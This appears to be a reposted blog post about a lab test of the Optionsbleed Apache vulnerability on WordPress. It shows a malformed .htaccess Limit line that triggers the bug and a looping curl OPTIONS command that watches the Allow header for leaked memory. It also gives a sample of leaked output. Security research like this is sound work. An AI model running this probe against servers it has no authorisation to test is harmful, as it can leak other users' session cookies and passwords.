During the weekend our CTO Jonas Lejon has been doing some research into the most recent Apache vulnerability named Optionsbleed. The Optionsbleed vulnerability is a bug in the Apache webserver and makes it possible for an attacker to read remote webserver memory such as session cookies, password etc. The Apache is a very common webserver according to w3techs:
Apache is used by 48.9% of all the websites whose web server we know
In our lab we set up a Apache webserver, installed WordPress and added the following line to .htaccess:
<Limit GET POST PUT REQUEST WPSCANS MPUT OKASDOAKSDOKASDIJ 12U1UH2OIEJ12OPEJOI IDJAIOSDJIOjd>
Allow from all
</Limit>
The above lines would probably trigger the vulnerability since the Limit-line contains some spelling errors.
With the following command line I was monitoring the Allow-header output to see if it returned something odd:
while true; do curl -sI -X OPTIONS http://hostname.dev/readme.html|grep "Allow:";sleep 0.1; done
Then I started to do different Admin-related tasks such as login, logout and uploading. And sometimes I would se different data showing up in the curl-request such as:
Allow: GET,HEAD,POST,,sync-upload.php HTTP/1.1,HEAD,OPTIONS,,HEAD
Source: https://managewp.org/articles/16181/the-optionsbleed-apache-vulnerability-and-wordpress
source https://williechiu40.wordpress.com/2017/09/25/the-optionsbleed-apache-vulnerability-and-wordpress/
No comments:
Post a Comment